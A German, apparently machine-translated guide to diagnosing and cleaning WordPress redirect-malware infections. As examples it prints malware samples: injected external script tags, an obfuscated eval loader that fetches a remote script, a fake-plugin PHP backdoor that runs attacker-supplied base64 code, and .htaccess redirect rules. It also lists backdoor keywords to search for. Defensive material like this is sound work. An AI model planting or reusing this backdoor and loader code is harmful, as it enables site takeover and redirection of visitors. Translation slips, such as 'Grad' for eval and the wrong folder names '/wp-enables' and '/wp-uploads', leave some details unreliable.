WordPress-Weiterleitungs-Hack? Wie bereinige ich eine Website?

drucken · Время на чтение: 27мин · von · Veröffentlicht · Aktualisiert

spielenHören Sie sich diesen Artikel an

WordPress ist mit Redirect-Redirect-Malware infiziert. Schädliche Weiterleitung.

Schädliche WordPress-Weiterleitung. Wenn Ihre WordPress-Website oder Ihr Admin-Panel automatisch auf eine Spam-Site weiterleitet, wurde Ihre Website wahrscheinlich gehackt und mit Weiterleitungs-Malware infiziert. Was können Sie also mit einer gehackten WordPress-Redirect-Malware auf Ihrer Website tun? Überprüfen Sie zunächst, ob ein Hack vorliegt, indem Sie Ihre Website scannen.

Es ist wichtig, sich daran zu erinnern, dass die Zeit hier Ihr bester Freund ist. Verschwenden Sie keine Zeit damit, sich darüber Gedanken zu machen. Wir werden den Hack vollständig beheben und Ihre Website kann bereinigt werden. Aber Sie müssen schnell handeln.

Ich führe Sie durch die Schritte, die Ihnen helfen, bösartige Weiterleitungen von Ihrer Website zu entfernen, Ihre Website zu reparieren und sicherzustellen, dass so etwas nicht noch einmal passiert. Bei mehreren Variationen des WordPress-Redirect-Hacks kann es schwierig sein, der Ursache auf den Grund zu gehen. Dieser Artikel hilft Ihnen Schritt für Schritt, Malware schnell zu finden und zu entfernen.

Der Inhalt des Artikels:

Was bedeutet eine gehackte Weiterleitung (böswillige Weiterleitung) in WordPress?

Eine gehackte WordPress-Weiterleitung ist eine böswillige Weiterleitung.
Gehackte Weiterleitung WordPress passiert, wenn bösartiger Code in Ihre Website eingeschleust wird, der Ihre Besucher dann automatisch auf eine andere Website umleitet. Typischerweise enthält die Zielwebsite Spam, Graumarkt-Pharmaprodukte oder illegale Dienste.

Es gibt viele Arten von Malware, wie zum Beispiel Favicon-Malware, die dieses Verhalten verursachen. Daher ist der WordPress-Malware-Redirect-Hack ein allgemeiner Begriff, der sich auf das vorherrschende Symptom bezieht: bösartige Weiterleitungen.

Diese Art von Hack betrifft Millionen von Websites und führt täglich zu horrenden Verlusten. Websites verlieren Umsatz, Branding und SEO-Rankings, ganz zu schweigen vom Stress der Erholung.

Das Schlimmste am Hacking ist jedoch, dass es immer schlimmer wird. Die Malware verbreitet sich über Dateien und Ordner und sogar über Ihre Website-Datenbank, kopiert sich selbst und nutzt Ihre Website, um andere zu infizieren.

Ich werde später in diesem Artikel auf die konkreten Folgen eines Hacks eingehen, aber es genügt zu sagen, dass Ihre Priorität bei der Rettung Ihrer Website darin besteht, sofort zu handeln und nicht zu zögern.

Woher weiß ich, ob meine WordPress-Site zu Spam weitergeleitet wird?

Bevor Sie das Problem mit beheben Umleitung einer gehackten WordPress-Site, müssen wir zunächst feststellen, dass Ihre Website definitiv gehackt wurde. Wie bei einer Infektion treten auch bei Hacks Symptome auf. Und wenn Sie dann die Symptome identifiziert haben, können Sie die Diagnose mit einigen Tests bestätigen.

Wie bereits erwähnt, sind automatische Weiterleitungen ein sicheres Zeichen für einen WordPress-Redirect-Hack. Spam-Weiterleitungen können über Suchergebnisse, auf bestimmten Seiten oder sogar dann erfolgen, wenn Sie versuchen, sich auf Ihrer Website anzumelden. Das Problem bei Weiterleitungen besteht darin, dass sie nicht immer konsistent und zuverlässig erfolgen.

Wenn Sie beispielsweise Ihre Website aufgerufen haben und diese umgeleitet wurde, passiert dies möglicherweise nicht beim zweiten, dritten oder vierten Mal. Hacker sind schlau und setzen ein Cookie, um sicherzustellen, dass das Problem nur einmal auftritt.

Dies hat zur Folge, dass man leicht in falsche Sicherheit verfällt, wenn man das Gefühl hat, dass es sich um einen Unfall handeln könnte. Es besteht eine geringe Wahrscheinlichkeit, dass es sich hierbei um einen Fehler im Code handelt, aber wenn ich „winzig“ sage, meine ich eine verschwindend geringe Wahrscheinlichkeit.

Suchen Sie nach Anzeichen einer gehackten Weiterleitung in WordPress

Hacks äußern sich in der Regel auf unterschiedliche Weise. Im Einzelfall kann es sich dabei um Website-Fehler wie einen alten Tracking-Code handeln. Wenn Sie jedoch zwei oder mehr dieser Symptome auf Ihrer Website feststellen, können Sie sicher sein, dass Ihre Website gehackt wurde.

  • Die WordPress-Site leitet auf eine Spam-Site weiter: Ein klassisches Symptom eines WordPress-Redirect-Hacks. Abhängig von der Malware-Variante kann die Weiterleitung auf unterschiedliche Weise oder an verschiedenen Stellen auf Ihrer Website erfolgen.
    Automatische Weiterleitungen: Malware leitet Ihre Besucher automatisch auf Spam-Websites weiter, wenn jemand Ihre Website besucht. Dies passiert auch, wenn jemand über Google oder Yandex auf Ihre Website gelangt. Normalerweise werden Sie auch weitergeleitet, wenn Sie versuchen, sich auf Ihrer Website anzumelden.
    Linkumleitung: Jemand klickt auf einen Link und wird dann auf eine andere Website weitergeleitet. Dies ist besonders sinnvoll, da Besucher beim Klicken auf Links sowieso erwarten, an einen anderen Ort weitergeleitet zu werden.
    Weiterleitungen nur für mobile Geräte: Nur wenn Ihre Website über ein mobiles Gerät aufgerufen wird, erfolgt eine Weiterleitung.
  • In den Google-Ergebnissen wird die Meldung „Website wurde möglicherweise gehackt“ angezeigt: Wenn Ihre Website in den Suchergebnissen erscheint, erscheint direkt unter dem Titel eine kleine Meldung: „Die Website wurde möglicherweise gehackt.“ Auf diese Weise macht Google Besucher auf eine potenziell gehackte Website aufmerksam.
  • Google-Blacklist: Das größte Warnsignal von allen – im wahrsten Sinne des Wortes – ist die schwarze Liste von Google ein sicheres Zeichen dafür, dass Ihre Website gehackt wurde. Selbst wenn Ihre Besucher eine andere Suchmaschine verwenden, verwenden sie auch die Google-Blacklist, um gehackte Websites zu kennzeichnen.
  • Site-Verbot in Yandex: Auch ein sicheres Zeichen für eine gehackte Website. Die Positionen Ihrer Website werden aus den Yandex-Suchergebnissen angezeigt. Vielleicht bleibt die Hauptseite bestehen, aber das ist keine Tatsache.
  • Google Ads markiert Skripte auf Ihrer Website: Wenn Sie versuchen, auf Ihrer Website Werbung zu schalten, crawlt Google Ads Ihre Website und warnt Sie vor Weiterleitungsszenarien in Ihren Beiträgen oder Seiten.
  • Der Webhoster hat Ihr Konto gesperrt: Websites sperren Websites aus mehreren Gründen, und Malware ist einer der Hauptgründe. Wenn Sie diese Meldung sehen, während Sie versuchen, auf Ihre Website zuzugreifen, überprüfen Sie aus irgendeinem Grund Ihre E-Mails. Alternativ können Sie sich auch an das Support-Team wenden.
  • Die Leute beschweren sich über Ihre Website: Das Schreckliche an Hacks ist, dass Website-Administratoren normalerweise die letzten sind, die von einem Hack erfahren, es sei denn, sie haben ein gutes Sicherheits-Plugin installiert. So viele Menschen erfahren davon, weil Website-Besucher und -Benutzer sich darüber beschweren, dass die Website in den Spam-Bereich weitergeleitet wird oder sogar Junk-E-Mails erhält.

Wenn Sie eines der oben aufgeführten Symptome bemerken, ist es eine gute Idee, Informationen darüber aufzuschreiben. Welchen Browser haben Sie verwendet? Welches Gerät haben Sie verwendet? Diese Informationen können dabei helfen, die Art der WordPress-Hacker-Malware zu identifizieren, mit der Sie konfrontiert sind, und sie somit schneller zu beseitigen.

Bestätigen Sie, ob Ihre Website mit einem Redirect-Hack infiziert ist

Der nächste Schritt zur Entdeckung des Symptoms besteht darin, sicherzustellen, dass es sich tatsächlich um einen Hack handelt. Der schnellste Weg, um sicherzustellen, dass Ihre Website anfällig für böswillige Weiterleitungen ist, besteht darin, Ihre Website zu scannen.

1. Scannen Sie Ihre Website mit einem Sicherheits-Plugin

Wenn Sie bei 100 % immer noch nicht sicher sind, ob Ihre Website gehackt wurde, verwenden Sie zur Bestätigung einen kostenlosen Online-Scanner. Ein sehr häufiger Fall ist der Zugriff auf Ihre Website über ein mobiles Gerät, was auf Malware in der .htaccess-Datei hinweist. Oder wir sehen oft einen Seiten-Hack, der automatisch weiterleitet. Dies geschieht, wenn sich Schadsoftware in der Datenbank befindet.

Später in diesem Artikel werden wir uns andere Varianten von Malware ansehen. An dieser Stelle möchte ich betonen, dass sich direkte, von WordPress gekapte Malware fast überall auf Ihrer Website befinden kann.

Aus diesem Grund wird es von jedem Scanner anders markiert. Quttera markiert Malware beispielsweise wie folgt:

Name der Bedrohung: Heur AlienFile gen

Und WordFence zeigt eine Warnung vor einer ganzen Reihe unbekannter Dateien an, etwa so:

* Unbekannte Datei im WordPress-Kern: wp-admin/css/colors/blue/php.ini
* Unbekannte Datei im WordPress-Kern: wp-admin/css/colors/coffee/php.ini
* Unbekannte Datei im WordPress-Kern: wp-admin /css/colors/ectoplasm/php.ini

Dies sind gute Anzeichen dafür, dass Ihre Website gehackt wurde, denn wie wir später sehen werden, sollte der Ordner /wp-admin nur die Kerndateien Ihrer WordPress-Installation enthalten.

Leider hilft es bei der Deinstallation nicht. Aufgrund ihrer Erkennungsmechanismen gibt es mehrere große Probleme bei der Erkennung von Malware durch andere Sicherheits-Plugins. Es gibt viele Fehlalarme, fehlende Dateien und viele andere Probleme. Ihre Website ist wichtig, also wählen Sie Ihr Sicherheits-Plugin mit Bedacht aus.

2. Scannen Sie mit einem Online-Sicherheitsscanner

Sie können auch einen Online-Sicherheitsscanner wie Sucuri SiteCheck verwenden, um nach gehackter Redirect-Malware zu suchen. Ein Online-Sicherheitsscanner oder ein externer Scanner scannt den Code auf Ihren Seiten und Beiträgen auf schädliche Skripte.

Das einzige Problem mit einem Front-End-Scanner besteht darin, dass er nur Code scannen kann und wird, auf den er Zugriff hat. Das ist im Grunde der Quellcode von Seiten und Beiträgen. Obwohl es auf diesen Seiten viele gehackte Weiterleitungs-Malware gibt, gibt es in den Kerndateien einige Optionen. Der externe Scanner zeigt sie überhaupt nicht an.

Ich empfehle die Verwendung eines Online-Sicherheitsscanners als erstes Diagnosetool. Wenn sich herausstellt, dass es positiv ist, können Sie sicher sein, dass es positiv ist, und an der Behebung des Hacks arbeiten. Fällt es negativ aus, können Sie die Stellen, die der Frontend-Scanner nicht gescannt hat, manuell überprüfen. Auf diese Weise können Sie einen Teil der manuellen Arbeit eliminieren.

3. Scannen Sie die Website manuell auf Malware

Wenn Sie ein Sicherheits-Plug-in verwenden, um nach gehackter Weiterleitungs-Malware zu suchen, können Sie diesen Abschnitt vollständig überspringen. Ein gutes Sicherheits-Plugin macht genau das, was ich unten vorschlage, aber viel schneller und besser.

Das Scannen Ihrer Website auf Malware bedeutet im Wesentlichen, nach unerwünschtem Code in Dateien und Datenbanken zu suchen. Ich verstehe, dass „Junk-Code“ als Empfehlung nutzlos ist, aber aufgrund der Optionen gibt es keine einzige Zeile, in der man schnell einen Hack finden und ankündigen kann.

Im nächsten Abschnitt habe ich jedoch einige Beispiele für Malware aufgelistet, die auf anderen Websites gefunden wurde. Und im nächsten Abschnitt werden wir über typische Orte sprechen, an denen Malware injiziert wird, abhängig vom beobachteten Weiterleitungsverhalten.

Wie WordPress-Redirect-Malware aussieht

Ich übertreibe diese Zeile in diesem Artikel, aber WordPress-Hack-Redirect-Malware bietet viele Optionen, und daher gibt es keinen einzigen Standard-Codeausschnitt, auf den man hinweisen könnte: „Suchen Sie danach!“

Ich kann Ihnen jedoch eine Vorstellung davon geben, wie einige Schadcodes aussehen:

  • Der Code kann sich irgendwo im Seitenkopf oder auf allen Seiten der wp_posts-Tabelle befinden. Hier sind einige Beispiele:

 

type='text/javascript' src='//www.dekeine.nl/wp-content/count.php?s=8131599557550&ver=5.7.2' id='hello_newscript5-js'> type='text/javascript' src='https://store.don/tkinhoo/ot./tw/m.js?w=085'> type='text/javascript' async src='https://db.d/live/rygoo/stra/tegy./com/js.min.js?s=p&'> type='text/javascript' src='https://coun/.tr/acks/tatis/icsss/./com/stm?v=l6.0.0'> type=text/javascript src='https://des/.coll/ectf/at/rac/ks./com/t.js'> src='https://js/donatel/firstly.ga/stat.js?n=ns1' type='text/javascript'>

  • Die wp_options-Tabellen enthalten möglicherweise unbekannte URLs in site_url. Hier sind einige Beispiele:
stat/traksatiticss dest/colecfattracks gotosecnd ws.stienernando

 

  • Skripte können auch verschleiert werden, was bedeutet, dass Sie sie durch einen Online-Deobfuscator laufen lassen müssen, um den eigentlichen Code zu extrahieren.

verschleierter Code

eval(StringfromCharCode32,40,102,117,110,99,116,105,111,110,40,41,32,123,10,32,32,32,32,118,97,114,32,112,111,32,61,32,100,111,99,117,1 09,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115 ,99,114,105,112,116, 39,41,59,10,32,32,32,32,112,111,46,116,121,112,101,32,61,32,39,116,101,120,116,47,106,97,118,97,115, 99,114,105,112,116,39,59,10,32,32,32,32,112,111 ,46,115,114, 99,32,61,32,39,104,116,116,112,115,58,47,47,106,115,46,100,101,118,101,108,111,112,101,114,115,116,97,116,11 5,115,46,103, 97,47,115,116,97,116,46,106,115,63,118,61,110,52,39,59,10,32,32,32 ,32,118, 97,114,32,115,32,61,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97 ,103,78,9 7,109,101,40,39,115,99,114,105,112,116,39,41,91,48,93,59,10, 32,32, 32,32,115,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,112,111,44 ,32,115 ,41,59,10,32,32,125,41,40,41,59));')

Und was bedeutet es eigentlich:

(function() var po = document.createElement('script'); po.type = 'text/javascript'; po.src = eloperatss.sat?v=n4'; var s = document.getElementsByTagName('script') [0];s.parentNode.insertBefore(po, s); )();
  • Gefälschte Plugins können Dateien enthalten, die beim Öffnen so aussehen:
<?php /** * Plugin Name: Wp Zzz * Plugin URI: https://wpforms.com * Description: Default WordPress plugin * Author: WPForms * Author URI: https://wpforms.com * Version: 1.6.3.1 * */ function simple_init() { $v = "base".chr(54).chr(52).chr(95).chr(100).chr(101).chr(99)."ode"; if(isset($_REQUEST['lt']) && md5($_REQUEST['lt']) == $v("MDIzMjU4YmJlYjdjZTk1NWE2OTBkY2EwNTZiZTg4NWQ=") ) { $n = "file_put_contents"; $lt = $v($_REQUEST['a']);$n('lte_','<?php '.$lt);$lt='lte_';if(file_exists($lt)){include($lt);unlink($lt);die();}else{@eval($v($lt));}}else{if(isset($_REQUEST['lt'])){echo $v('cGFnZV9ub3RfZm91bmRfNDA0');}} } add_action('init','simple_init'); function my_custom_js() { echo ' '; } add_action( 'admin_head', 'my_custom_js' ); add_action( 'wp_head', 'my_custom_js' );
  • Mobile Weiterleitungen weisen auf Änderungen an der .htaccess-Datei hin. Der folgende Code leitet zu https://daily-prize-best /life/?u=y2ykaew&o=2xup89r&m=1&t=mns2 weiter.
RewriteEngine auf RewriteRule ^.+\.txt$ https://bit.ly/3iZl8mm [L] RewriteRule ^.+\.htm$ https://bit.ly/3iZl8mm [L] RewriteRule ^.+\.html$ https:/ /bit.ly/3iZl8mm [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . https://bit.ly/3iZl8mm[L] RewriteEngine auf RewriteBase / RewriteRule ^index.php$ - [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . index.php[L]

Orte, an denen Sie nach umgeleiteter Malware suchen können

WordPress ist in zwei Hauptteile unterteilt: Dateien und Datenbank. Das Problem mit gehackter Redirect-Malware besteht darin, dass sie überall sein kann.

Wenn Sie mit der Änderung Ihres Website-Codes vertraut sind, finden Sie den von mir erwähnten Weiterleitungscode an den folgenden Stellen. Laden Sie eine Sicherungskopie Ihrer Website (Dateien und Datenbank) herunter, um nach verdächtigen Add-ons zu suchen.

Bedenken Sie auch hier, dass es Optionen wie klassische, situative, gerätespezifische oder sogar gebündelte Weiterleitungen gibt. Der Code wird für jeden unterschiedlich sein, ebenso wie der Standort.

A. Website-Dateien

  • WordPress-KerndateienA: Beginnend mit den einfachsten sollten sich /wp-admin und /wp-includes nicht von einer neuen WordPress-Installation unterscheiden. Das Gleiche gilt für die Dateien index.php, Settings.php und Load.php. Dies sind die Kerndateien von WordPress und die Einstellungen nehmen keine Änderungen daran vor. Vergleichen Sie es mit einer Neuinstallation von WordPress, um festzustellen, ob es Änderungen gibt. Die .htaccess-Datei ist ein Sonderfall. In dieser Datei wird fast immer ein mobiler Redirect-Hack auftauchen. Suchen Sie nach der Benutzeragentenregel, die gerätespezifisches Verhalten definiert, und suchen Sie nach dem Umleitungsskript.
  • Aktive Theme-Dateien: Wenn Sie mehr als ein Theme installiert haben (was zunächst nicht empfohlen wird), stellen Sie sicher, dass nur eines davon aktiv ist. Überprüfen Sie dann Ihre aktiven Designdateien wie header.php, footer.php und Functions.php auf seltsamen Code. Eine gute Möglichkeit, dies zu testen, besteht darin, reine Installationen von den Websites der Entwickler herunterzuladen und den Code mit diesen Dateien abzugleichen. Normalerweise müssen diese Dateien in einem bestimmten Format vorliegen, weshalb der Müllcode hervorsticht. Beachten Sie, dass sich durch die Einstellungen auch der Code ändert. Wenn Sie nullte Themes oder Plugins verwenden, können Sie die Diagnose auch hier stoppen, da wir Ihnen versichern können, dass Sie aufgrund dieser Themen gehackt wurden.
  • Gefälschte Plugins auf Ihrer Website: Ja, das ist der Fall. Hacker maskieren Malware und machen sie so legitim wie möglich. Gehen Sie zum Ordner wp-content/plugins und schauen Sie nach. Etwas, das Sie nicht installiert haben? Einige seltsame Duplikate? Hat einer von ihnen nur eine oder zwei Dateien in seinen Ordnern?

Hier sind einige Beispiele:

/wp-content/plugins/mplugin/mplugin.php /wp-content/plugins/wp-zzz/wp-zzz.php /wp-content/plugins/Plugin/plug.php

Wenn Sie viele Plugins installiert haben, kann es schwierig sein, sie alle zu überprüfen. Als Faustregel zum Erkennen gefälschter Plugins gilt, dass legitime Plugin-Namen vereinbarungsgemäß selten mit einem Großbuchstaben beginnen und ihre Namen außer Bindestrichen keine Sonderzeichen enthalten. Dabei handelt es sich nicht um Regeln, sondern um Konventionen. Messen Sie ihnen also nicht zu viel Bedeutung bei, um Fälschungen eindeutig zu erkennen. Wenn Sie vermuten, dass ein Plugin gefälscht ist, googeln Sie es und finden Sie die Originalversion im WordPress-Repository. Laden Sie es von dort herunter und prüfen Sie, ob die Dateien übereinstimmen.

B. Datenbank

  • wp_posts-Tabelle: Schädliche Skripte sind häufig auf jeder Seite vorhanden. Aber wie wir bereits gesagt haben, sind Hacker sehr gerissen. Schauen Sie sich eine gute Auswahl an Beiträgen an, bevor Sie entscheiden, dass es keinen Hack gibt. Eine weitere Möglichkeit, den Code Ihrer Seiten und Beiträge zu überprüfen, besteht darin, den Quellcode der Seite mithilfe eines Browsers zu überprüfen. Jede Seite Ihrer Website verfügt über einen HTML-Code, der von Browsern gelesen werden kann. Öffnen Sie den Quellcode der Seite und überprüfen Sie die Kopfzeile, die Fußzeile und alles zwischen den Skript-Tags auf Dinge, die fehl am Platz erscheinen. Der Kopfabschnitt enthält Informationen, die der Browser zum Laden dieser Seite verwendet, die dem Besucher jedoch nicht angezeigt werden. Malware-Skripte werden hier oft versteckt, sodass sie vor dem Rest der Seite geladen werden.
  • wp_options-Tabelle: Überprüfen Sie die Site-URL. In 99%-Fällen sollte dies die URL Ihrer Website sein. Wenn nicht, dann ist dies Ihr Trick hier.

Allerdings ist es jetzt nicht an der Zeit, etwas zu entfernen. Sie müssen absolut sicher sein, dass Javascript- oder PHP-Skripte definitiv bösartig sind. Sie möchten Malware sehr schnell loswerden, aber wenn Sie sich beeilen, gelangen Sie auf eine nicht erreichbare Website.

Andere Möglichkeiten, nach Malware-Weiterleitungen zu suchen

Als Website-Administrator sehen Sie möglicherweise nicht alle der oben aufgeführten Symptome. Hacker schließen Ihre IP-Adresse und Ihr Konto geschickt von der Einsicht in die Ergebnisse eines Hacks aus, weil sie so lange wie möglich unentdeckt bleiben wollen.

Es kann auch sein, dass Sie das Symptom einmal sehen und es dann nicht mehr reproduzieren können. Das alles ist sehr verwirrend. Es gibt mehrere andere Möglichkeiten, nach Symptomen zu suchen, wenn Sie diese nicht direkt auf Ihrer Website sehen.

  • Überprüfen Sie die Google Search Console: Sie kennzeichnen Malware-Infektionen im Abschnitt „Sicherheitsprobleme“.
  • Verwenden Sie einen Inkognito-Browser, um auf Ihre Website zuzugreifenum zu sehen, was ein regelmäßiger Besucher sieht
  • Überprüfen Sie die Aktivitätsprotokolle auf ungewöhnliche BenutzeraktivitätenB. das Erhöhen von Benutzerrechten oder das Verfassen von Nachrichten.

Im nächsten Abschnitt geht es ausschließlich um das Löschen. Atmen Sie tief ein und trinken Sie eine Tasse Tee oder Kaffee. Lassen Sie uns den gesamten Prozess gemeinsam durchgehen.

Wie entferne ich eine gehackte WordPress-Redirect-Infektion?

Da wir nun wissen, dass Ihre Website auf eine andere Website weiterleitet, müssen Sie schnell handeln. Mit der Zeit nimmt die Zahl der Hacks exponentiell zu, da sich Malware auf immer mehr Dateien und Ordner auf Ihrer Website ausbreitet. Dies erhöht nicht nur den Schaden, sondern erschwert auch die Wiederherstellung erheblich.

Ich gehe davon aus, dass Sie Ihre Website bereits gecrawlt haben, bevor Sie diesen Abschnitt erreicht haben. Wenn Sie dies jedoch nicht getan haben, sollten Sie zunächst Ihre Website crawlen.

Es gibt zwei Möglichkeiten, bösartige Weiterleitungen von Ihrer Website zu entfernen. Ich empfehle dringend, das Sicherheits-Plug-in zu verwenden, da ich aus erster Hand gesehen habe, welchen Schaden Hacks einer Website zufügen können.

1. (EMPFOHLEN) Verwenden Sie ein Sicherheits-Plugin, um den Redirect-Virus zu entfernen

Sicherheits-Plugins werden verwendet, um schwer erkennbare Malware zu entfernen. Sie müssen lediglich das Plugin auf Ihrer Website installieren und einige Minuten warten, bis Ihre Website wiederhergestellt ist.

Wenn Sie einen Scanner verwendet haben, um zu bestätigen, dass Ihre Website gehackt wurde, müssen Sie ihn nur aktualisieren und Ihre Website wiederherstellen.

Es gibt mehrere Gründe, warum die Verwendung solcher Plugins empfohlen wird:

  1. Entfernen Sie nur Malware und lassen Sie Ihre Website intakt.
  2. Finden Sie Hintertüren, die Hacker zur erneuten Infektion hinterlassen, und entfernen Sie sie.
  3. Integrierte Firewall zum Schutz Ihrer Website vor bösartigem Datenverkehr.

Wenn Sie nicht auf wp-admin zugreifen können

Wenden Sie sich in diesem Fall an den Notfall-Malware-Entfernungsdienst, um Hilfe zu erhalten. Ein engagierter Sicherheitsexperte bereinigt Ihre Website schnell und stellt sicher, dass sie in kürzester Zeit wieder betriebsbereit ist.

2. Entfernen Sie WordPress-Redirect-Malware manuell

Es ist möglich, manuelle Weiterleitungs-Malware von Ihrer Website zu entfernen, es gibt jedoch Voraussetzungen dafür.

- Zunächst müssen Sie wissen, wie WordPress konfiguriert ist. Von der Art, wie die Kerndateien aussehen, bis hin zu den Ordnern und Dateien, die jedes Plugin und Theme für die Arbeit erstellt. Das Löschen einer erforderlichen Datei kann zum Absturz Ihrer Website führen, sodass Ihre Website nicht nur gehackt, sondern auch deaktiviert wird.

- Zweitens müssen Sie in der Lage sein, guten Code von schlechtem zu unterscheiden, d. h. Schadsoftware. Schädlicher Code wird entweder als legitimer Code getarnt oder so verschleiert, dass er nicht gelesen werden kann. Es ist sehr schwierig, guten Code von schlechtem Code zu unterscheiden, weshalb viele Scanner unter Fehlalarmen leiden.

NotizA: Sie können einen WordPress-Experten damit beauftragen, Malware zu entfernen. Bedenken Sie, dass Sicherheitsexperten teuer sind und Zeit brauchen, um einen Hack zu entfernen.

Sie garantieren auch nicht, dass Sie keinen Rückfall erleiden. Ich empfehle jedoch dennoch diese Vorgehensweise, anstatt zu versuchen, Malware manuell zu entfernen.

Okay, das sind die Vorbehalte. Hier sind die Schritte zum Entfernen von Weiterleitungs-Malware von Ihrer Website:

1. Sichern Sie Ihre Website

Erstellen Sie unbedingt ein Backup, bevor Sie etwas unternehmen. Selbst wenn die Seite gehackt wird, funktioniert sie immer noch. Wenn also beim Malware-Entfernungsprozess etwas schiefgeht, können Sie auf ein Backup zurückgreifen. Eine gehackte Website ist schwer zu bereinigen. Eine kaputte Website ist noch schwieriger zu bereinigen und manchmal sogar unmöglich wiederherzustellen.

Der Webhost kann Ihre Website sperren oder sogar entfernen. Dann ist es ein großes Problem, auch nur zum Scrapen Zugriff auf Ihre Website zu erhalten. Sie müssen sich an das Support-Team des Webhosts wenden, um auf die gesperrte Site zuzugreifen. Eine gelöschte Site ist jedoch nicht ohne ein Backup möglich.

2. Laden Sie eine saubere Version von WordPress herunter

Laden Sie neue WordPress-Installationen sowie alle von Ihnen verwendeten Plugins und Themes herunter. Die Versionen sollten mit denen auf Ihrer Website übereinstimmen.

Nach dem Herunterladen können Sie die leeren Dateien zum Vergleich mit den Dateien Ihrer Website verwenden. Sie können den Online-Diff-Checker verwenden, um die Unterschiede zu finden, da wir auf keinen Fall empfehlen, sie manuell durchzusehen.

Im Wesentlichen handelt es sich dabei um einen Signaturabgleich, den die meisten Sicherheitsscanner durchführen. Zumindest wissen Sie jetzt jedoch, welche Dateien und Ordner erforderlich sind, damit Ihre Site ordnungsgemäß funktioniert. Löschen Sie zu diesem Zeitpunkt noch nichts. Sie legen lediglich die Grundlinie fest, um zu verstehen, welche Dateien benötigt werden.

3. Suchen Sie nach Redirect-Malware und entfernen Sie sie

Dies ist vielleicht der schwierigste Schritt in diesem Prozess. Wie gesagt, Sie müssen in der Lage sein, guten Code von schlechtem Code zu unterscheiden und ihn dann nach Bedarf zu entfernen oder zu ersetzen.

Bereinigen Sie die WordPress-Kerndateien

Es ist äußerst wichtig, die gleiche WordPress-Version wie Ihre Website zu verwenden, da es sonst zu einem Absturz der Website kommen kann. Nach dem Hochladen können Sie über cPanel oder FTP auf Ihre Website-Dateien zugreifen und die folgenden Ordner ersetzen:

/wp-admin
/wp-enables

Diese Ordner werden von WordPress zum Ausführen und Laden Ihrer Website verwendet und sind überhaupt nicht dazu gedacht, Benutzerinhalte zu speichern. Das war der einfache Teil. Überprüfen Sie nun die folgenden Dateien auf seltsamen Code:

- index.php
wp-config.php
wp-settings.php
- wp-load.php
- .htaccess

Außerdem sollten sich im Ordner /wp-uploads keine PHP-Skripte befinden. Mir ist klar, dass „seltsamer Code“ sehr vage ist, aber wie wir bereits sagten, bietet eine gehackte WordPress-Redirect-Malware viele, viele Möglichkeiten.

Daher kann ich Ihnen nicht genau sagen, welchen Code Sie in einer dieser Dateien sehen werden. Wenn Sie verstehen, wie der Code funktioniert, können Sie anhand der Liste der WordPress-Dateien nachvollziehen, was jede einzelne tut, und sehen, ob einer der Codes etwas anderes bewirkt. Wenn Sie sicher sind, dass Sie diesen Code gefunden haben, löschen Sie ihn.

Befreien Sie Themes und Plugins von Malware

Alle mit dem Theme und Plugin verknüpften Dateien und Ordner werden im Ordner /wp-content gespeichert. Sie können jede Datei Ihrer Website überprüfen, um festzustellen, wo es Unterschiede im Code gibt.

Hier ist Vorsicht geboten: Nicht jede Veränderung ist schlecht. Wenn Sie eines Ihrer Plugins oder Themes angepasst haben – was wahrscheinlich der Fall ist –, gibt es Unterschiede zu einer Neuinstallation. Wenn es Ihnen nichts ausmacht, diese Einstellungen zu verlieren, können Sie die Dateien in großen Mengen ersetzen.

Wahrscheinlich möchten Sie die Arbeit, die Sie geleistet haben, beibehalten. Sehen Sie sich also die einzelnen Unterschiede sorgfältig an. Wenn Sie der Logik des Codes folgen können, können Sie verstehen, wie die Dateien miteinander und mit dem Rest Ihrer Website interagieren. Dies sollte es Ihnen ermöglichen, die Malware zu finden und zu entfernen.

Wenn Sie über eine große Anzahl an Themes und Plugins verfügen, kann dies eine entmutigende Aufgabe sein. Hier sind einige gute Ausgangspunkte:

  • Aktive Theme-Dateien
    header.php
    footer.php
    Funktionen.php
  • Anfällige Plugins
    - Wurde kürzlich jemand gehackt?
    - Gibt es welche, die nicht aktualisiert wurden?
  • Gefälschte Plugins
    - Sehr wenige Dateien
    - Offensichtliche Duplikate

Einige schädliche Dateien sehen harmlos aus und imitieren häufig echte Dateinamen. Hier sind Neuinstallationen praktisch, aber wenden Sie sich auch an die Plugin- und Theme-Entwickler, wenn Sie sich nicht ganz sicher sind.

Entfernen Sie Malware aus der WordPress-Datenbank

Verwenden Sie phpMyAdmin, um die Datenbank zum Bereinigen hochzuladen. Überprüfen Sie anschließend die Tabellen auf verdächtige Inhalte wie Spam-URLs oder Schlüsselwörter. Entfernen Sie diesen Inhalt vorsichtig und stellen Sie sicher, dass es sich um fehlerhaften Code und nicht um modifizierten guten Code handelt.

Überprüfen Sie insbesondere die folgenden Tabellen:

- wp_options
- wp_posts

Abhängig von der Größe Ihrer Website kann dies eine beträchtliche Zeit in Anspruch nehmen. Wenn sich die Malware in Ihrer wp_posts-Tabelle befindet, ist sie im Allgemeinen in jedem einzelnen Beitrag enthalten. Wenn Sie Hunderte von Beiträgen mit viel Inhalt haben, ist die manuelle Bereinigung eine gewaltige Aufgabe.

Sobald Sie jedoch das Malware-Skript identifiziert haben, können Sie SQL verwenden (oder jemanden bitten, der sich mit SQL auskennt), um das Skript aus jeder Nachricht zu entfernen. Der Vorbehalt hierbei ist, dass Sie nicht sicher sein können, dass dies die einzige Malware auf dem Tisch ist.

Überprüfen Sie außerdem insbesondere bei E-Commerce-Websites noch einmal, ob Sie wichtige Benutzer- oder Bestellinformationen entfernen.

4. Hintertüren entfernen

Nachdem Sie Ihre Website nun von Malware befreit haben, suchen Sie nach Hintertüren. Dies sind Einstiegspunkte zu Ihrer Website, die ein Hacker hinterlässt, damit er Ihre Website erneut infizieren kann, wenn sein ursprünglicher Hack entdeckt wird.

Hintertüren können an mehreren Stellen vorhanden sein. Etwas Code zum Durchsuchen:

  • Grad
  • base64_decode
  • gzinflate
  • preg_replace
  • str_rot13

Ein Wort der Vorsicht: Sie sind nicht unbedingt alle schlecht. Hierbei handelt es sich um legitime PHP-Skripte, die leicht modifiziert werden können, um als Hintertüren zu dienen. Seien Sie vorsichtig, wenn Sie sie ohne ordnungsgemäße Analyse entfernen.

